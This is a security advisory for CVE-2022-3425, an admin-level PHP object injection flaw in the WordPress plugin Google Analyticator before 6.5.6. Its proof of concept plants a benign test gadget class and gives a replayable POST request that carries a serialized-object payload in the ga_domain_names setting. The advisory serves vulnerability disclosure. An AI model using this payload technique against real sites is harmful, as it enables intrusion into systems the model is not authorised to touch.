Google Analyticator < 6.5.6 – Admin+ PHP Object Injection | CVE 2022-3425

Description

The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

Proof of Concept

To simulate a gadget chain, put the following code in the plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then, as Admin, go to the plugin settings page (/wp-admin/admin.php?page=google-analyticator), save them and intercept the request made, then add ga_domain_names=O:4:"Evil":0:{}; to it and replay it: 

POST /wp-admin/admin.php?page=google-analyticator HTTP/1.1

_wpnonce=<nonce-key>&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dgoogle-analyticator&ga_status=disabled&ga_uid=UA-XXXXXXXX-X&ga_analytic_snippet=disabled&key_ga_show_ad=1&info_update=Save+Changes&ga_annon=0&ga_admin_status=enabled&ga_admin_role%5B%5D=administrator&ga_admin_disable=remove&ga_admin_disable_DimentionIndex=&ga_enable_remarketing=0&key_ga_track_login=0&ga_outbound=enabled&ga_event=enabled&ga_enhanced_link_attr=disabled&ga_downloads=&ga_outbound_prefix=outgoing&ga_downloads_prefix=download&ga_adsense=&ga_extra=&ga_extra_after=&ga_widgets=enabled&ga_dashboard_role%5B%5D=administrator&ga_domain_names=O:4:"Evil":0:{};


The response will contain the "Arbitrary deserialization" output.